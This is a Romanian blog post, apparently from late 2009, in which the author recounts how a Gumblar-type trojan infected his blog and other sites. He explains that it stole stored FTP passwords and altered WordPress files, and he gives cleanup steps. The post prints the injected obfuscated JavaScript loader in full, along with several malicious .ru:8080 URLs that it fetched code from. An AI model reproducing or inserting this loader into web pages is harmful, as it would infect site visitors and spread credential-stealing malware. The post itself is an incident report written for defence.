Am reusit sa-mi umplu blogul si multe alte alte siteuri cu nenorocirea de mai jos
<script>/*GNU GPL*/ try{window.onload = function(){var V9vs0ipwfom = document.createElement('script'); V9vs0ipwfom.setAttribute('type', 'text/javascript'); V9vs0ipwfom.setAttribute('id', 'myscript1'); V9vs0ipwfom.setAttribute('src', 'h#&t$^&t#&!^&p$#!#:^/$!!/!&#g))a#(m&!@e!r@)-#)@c&^$o#& (m@^-&^#(t#@#(w^.^w$$r^)!z(&#u&t&()a)(.&#!p@@$&l!!).)@p)#$l$&a^(y)^@^-(c)^^o^!@@m&!(#.)b&#)(r))(o! (w!!#n!#b&&a&&(@g#^b$&&a#&r@@#.$#& (r(u(:$^#8#)0($8!0!&&/((&g)o((&(o@#(g()(l@e!@).^)c^!)@^o^#)m^&! /&)@g#)$!o(o##&g)l#)!e!&@).^(c!(o(!$m^)^/!@&w!@o(^!r(@!(d@#$p!$r$# (!&e)s$^s(!.$o#@(r@g^@!/@!#h@p@^.$c@^o&()m^@)/$#)^s$u)r)v!e)@$y$$m&!!o) (@$n!@k&#@e$(#&$y!#^$.!#c#&o&m!(/&&' .replace(/@|&|\)|\^|#|\(|\$|\!/ig, '')); V9vs0ipwfom.setAttribute('defer', 'defer'); document.body.appendChild(V9vs0ipwfom);}} catch(e) {}</script>
Cod care rula scriptul de la adrresa http://gamer-com-tw.wrzuta.pl.play-com.brownbagbar.ru:8080/google.com/google.com/wordpress.org/hp.com/surveymonkey.com/
Cautand pe google am descoperit ca exista mai multe adrese de unde isi lua cod:
- http://live.com.google.com.baidu-msn.com.bestartsale.ru:8080/wordpress.com/google-mail.it/livejasmin-photobucket.com/cnet-cnn.com/about-ebay.com/
- http://google-cn.msn.ca.shoplocal-com.easymusicstore.ru:8080/interia.pl/interia.pl/google.com/empflix.com/debonairblog.com/
- http://xtube-com.blogger.com.pornorama-com.bluejackmusic.ru:8080/hdfcbank.com/hdfcbank.com/google.com/fanpop.com/in.com/
AVG si Kaspersky nu au gasit nimic neinregula pe calculator, nici macar nu au observat infectarea, dar din fericire Malwarebytes Anti-Malware si-a facut treaba:
Files Infected:
C:\Documents and Settings\** user **\Start Menu\Programs\Startup\siszyd32.exe (Trojan.Agent)
C:\WINDOWS\system32\av_md.exe (Trojan.Dropper)Registry Values Infected:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sysgif32 (Trojan.Agent)
Ok, Ryan Isra zice ca e o varianta mai noua de Gumblar, un trojan dubios. Cum te infectezi cu el? Probabil intri cu Internet Explorer pe un site infectat si e de ajuns…
Ce face troianul asta?
Fura parolele de ftp memorate de Filezilla (sunt salvate in clar intr-un xml) si Total Commander (parole criptate reversibil) – probabil si alti clienti de ftp – si mai apoi infecteaza in siteurile cu parole ftp memorate tot ce se numeste
index*.php/html
default*.php/html
home*.php/html*.js
In WordPress fisierele modificate sunt
index.php
wp-admin/index.php
wp-admin/index-extra.php
wp-admin/js/* (toate)
wp-includes/default-filters.php
wp-includes/default-widgets.php
wp-includes/js/* (cam toate)
wp-content/index.php
wp-content/plugins/index.php
wp-content/themes/index.php
–
wp-content/themes/**folder tema**/index.php
wp-content/themes/**folder tema**/home.php (daca exista)
wp-content/themes/**folder tema**/*.js (daca exista)
Solutia?
- Scanare si curatare cu Malwarebytes Anti-Malware
- Reset Windows
- Schimbare parola FTP
- Re-upload fisiere infectate daca hostingul nu are un serviciu de backup si un bakup recent al fisierelor.
- In cazul WordPress recomand ultima versiune si reuploadarea tuturor fisierelor + verificarea fisierelor temei/temelor instalate
Din fericire Webfactor are backupuri de toate felurile si am reusit sa refac toate siteurile infectate si gazduite la ei, dar din nefericire am infectat foarte multe alte siteuri la care aveam acces FTP.
45 reacţii · Comenteaza · Urmăreste comentariile prin RSS
Reactii pe bloguri
13 decembrie 2009
14 decembrie 2009
22 decembrie 2009
25 decembrie 2009
25 decembrie 2009
29 decembrie 2009
30 decembrie 2009
20 aprilie 2010
7 decembrie 2010
1 februarie 2012